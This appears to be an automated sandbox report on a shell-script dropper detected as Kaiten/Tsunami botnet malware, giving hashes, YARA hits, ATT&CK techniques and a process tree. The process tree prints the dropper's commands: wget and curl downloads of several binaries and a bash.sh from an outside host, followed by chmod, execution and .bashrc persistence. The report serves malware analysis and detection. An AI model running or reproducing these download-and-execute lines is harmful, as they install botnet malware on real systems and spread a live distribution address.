Analysis
-
max time kernel
54s -
max time network
68s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
23-10-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
-
Size
3KB
-
MD5
cf70ee36f1e9247f2146e4981924d4f4
-
SHA1
7eabae4200118c4e89979658db6e4d905fe3dae9
-
SHA256
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
-
SHA512
60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 2 IoCs
Processes:
resource yara_rule /tmp/m3cr0 family_kaiten2 /tmp/zigaarch64 family_kaiten2 -
Detects Kaiten/Tsunami payload 2 IoCs
Processes:
resource yara_rule /tmp/m3cr0 family_kaiten /tmp/zigaarch64 family_kaiten -
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodpid process 741 chmod 778 chmod 788 chmod 829 chmod -
Executes dropped EXE 4 IoCs
Processes:
m3cr0zigaarch64x00xm3cr0ioc pid process /tmp/m3cr0 744 m3cr0 /tmp/zigaarch64 779 zigaarch64 /tmp/x00x 789 x00x /tmp/m3cr0 830 m3cr0 -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
Processes:
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.shdescription ioc process File opened for modification /root/.bashrc 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh -
Modifies Bash startup script 2 TTPs 1 IoCs
Processes:
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.shdescription ioc process File opened for modification /root/.bashrc 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh -
Processes:
curlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlwgetcurlwgetwgetwgetcurlwgetdescription ioc process File opened for modification /tmp/x00x curl File opened for modification /tmp/bash.sh curl File opened for modification /tmp/m3cr0 curl File opened for modification /tmp/zigaarch64 wget File opened for modification /tmp/zigaarch64 curl File opened for modification /tmp/x00x wget File opened for modification /tmp/m3cr0 wget File opened for modification /tmp/m3cr0 wget File opened for modification /tmp/m3cr0 curl File opened for modification /tmp/bash.sh wget
Processes
-
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh1⤵
- Creates/modifies environment variables
- Modifies Bash startup script
PID:690 -
/usr/bin/wgetwget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr02⤵
- Writes file to tmp directory
PID:694
-
-
/usr/bin/curlcurl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/chmodchmod +x m3cr02⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/m3cr0./m3cr02⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm -rf m3cr02⤵PID:763
-
-
/bin/rmrm -rf m3cr0.12⤵PID:764
-
-
/usr/bin/wgetwget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch642⤵
- Writes file to tmp directory
PID:767
-
-
/usr/bin/curlcurl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/chmodchmod +x zigaarch642⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/zigaarch64./zigaarch642⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm -rf zigaarch642⤵PID:781
-
-
/bin/rmrm -rf zigaarch64.12⤵PID:782
-
-
/usr/bin/wgetwget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x2⤵
- Writes file to tmp directory
PID:783
-
-
/usr/bin/curlcurl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/chmodchmod +x x00x2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/x00x./x00x2⤵
- Executes dropped EXE
PID:789
-
-
/bin/rmrm -rf x00x2⤵PID:793
-
-
/bin/rmrm -rf x00x.12⤵PID:794
-
-
/usr/bin/wgetwget http://floodernetwork111.accesscam.org:8089/bash.sh2⤵
- Writes file to tmp directory
PID:795
-
-
/usr/bin/curlcurl -O http://floodernetwork111.accesscam.org:8089/bash.sh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/rmrm -rf bash.sh.12⤵PID:815
-
-
/bin/bashbash bash.sh2⤵PID:814
-
/usr/bin/wgetwget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr03⤵
- Writes file to tmp directory
PID:816
-
-
/usr/bin/curlcurl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr03⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/chmodchmod +x m3cr03⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/m3cr0./m3cr03⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm -rf m3cr03⤵PID:832
-
-
/bin/rmrm -rf m3cr0.13⤵PID:833
-
-
/bin/sleepsleep 60003⤵PID:834
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Privilege Escalation
Boot or Logon Autostart Execution
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
983KB
MD575c00b238bd8105414cbb5d08601ca1a
SHA12a5e59555f348bfd9fa9fc4e3e04338ee4e74576
SHA256edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361
SHA512a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5
-
Filesize
454KB
MD5329c40f5253efe5909214b73f9ee0085
SHA185c0fd22c8a1f860fe047980dc4f94a5ec48278d
SHA256a166155f1f60f411e71db6a34a38de4e5141e1efcb3a7180d215cf4789fe3106
SHA5129bc97d97b3f708799045811f09f6f159de8ef4a792801528b88e977a67546be0ee52726c71272e07fa510638adc7365a5d174e3ef9f3da54b13868363c0ed873
-
Filesize
73KB
MD548ea3c3566c796e4f74e8e3d6df15cd3
SHA1b1ef1574ced09471c26a4c749d5a4ab5ba7942cd
SHA25679b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a
SHA512cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd